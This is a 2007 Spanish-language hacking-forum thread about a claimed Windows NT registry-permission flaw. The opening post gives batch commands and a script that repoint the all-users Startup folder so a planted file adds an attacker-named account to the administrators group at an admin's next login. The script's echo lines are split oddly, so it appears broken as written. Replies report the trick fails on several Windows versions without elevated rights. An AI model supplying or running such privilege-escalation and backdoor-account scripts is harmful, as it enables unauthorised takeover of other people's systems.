elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
14 Febrero 2012, 07:01  


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Fallos en los permisos del registro de Windows NT
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Fallos en los permisos del registro de Windows NT  (Leído 2,360 veces)
neox.

Desconectado Desconectado

Mensajes: 52



Ver Perfil
Fallos en los permisos del registro de Windows NT
« en: 11 Marzo 2007, 16:26 »

Bien, aqui vamos con una nueva vulnerabilidad de NT, la acabo de probar en mi Windows Vista y no funciona, pero aun tengo que probar en mas PCs.


El fallo esta en que cualquier usuario autentificado puede modificar el valor de la clave : \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Common Startup\"

que contiene la ruta de la famosa \"Carpeta de Inicio\" aunque no se tengan privilegios de admin.


Modificamos el valor de dicha clave y colocamos la ruta de otra carpeta que previamente hayamos creado, en dicha carpeta tambien es necesario que incluyamos el siguiente script batch:

Código:
net user <nombre_cuenta> /add /domain
net localgroup <nombre_grupo_admins> <nombre_cuenta> /add

Como sabreis sin privilegios de admin ese script no finalizara sin error, pero al modificar la ruta de la carpeta de inicio, en el proximo inicio de sesion del admin se ejecutara correctamente.

Resumido en este script:
Código:
:: Fallos en los permisos del registro de Windows NT
:: Fuente :  http://www.hispasec.com/unaaldia/499

:: Definir las varibles:
set RUTA=<ruta_de_la_nueva_carpeta_de_inicio>
if not exist \"\"\"%RUTA%\"\"\" echo La ruta no existe&exit /B 1
reg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\" /v \"Common Startup\" /t REG_EXPAND_SZ /d \"\"\"%RUTA%\"\"\" /f
> %RUTA%\\win32.bat echo
net user <nombre_cuenta> /add /domain
>> %RUTA%\\win32.bat echo
net localgroup administrators <nombre_cuenta> /add /domain
if errorlevel 0 echo Exito !&exit /B 0

Ya tendremos una nueva cuenta.




Problemas que he encontrado: en mi Vista no puedes modificar la clave sin ser usuario avanzado, asi que por favor que alguien la pruebe en un XP.

Fuente: http://www.hispasec.com/unaaldia/499
« Última modificación: 13 Marzo 2007, 20:21 por neox. » En línea
sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.946


Lavando Platos


Ver Perfil WWW
Re: Fallos en los permisos del registro de Windows NT
« Respuesta #1 en: 13 Marzo 2007, 02:24 »

en Windows 2000 SP4 no sirve.. mas que como usuario avanzado

usuario invitado: no tiene permiso
usuario: no tiene permiso
usuario avanzado: si tiene permiso
duplicador: si tiene permiso
administrador: si tiene permiso

Saludos!!
En línea

sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.946


Lavando Platos


Ver Perfil WWW
Re: Fallos en los permisos del registro de Windows NT
« Respuesta #2 en: 13 Marzo 2007, 21:59 »

Tampoco funciona en Windows Server 2003.
Tampoco en Windows XP Service Pack 1 ni 2

aqui hasta les puse un screen en la de SP1 xD


mañana pruebo en Windows XP sin service pack :P
« Última modificación: 13 Marzo 2007, 22:04 por Sirdarckcat » En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
permisos en windows xp
Windows
xemnas 3 1,524 Último mensaje 23 Abril 2011, 11:02
por xemnas
Permisos desactivados en registro de Windows 7 « 1 2 »
Windows
oskoa 25 1,422 Último mensaje 29 Noviembre 2011, 06:43
por Randomize
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines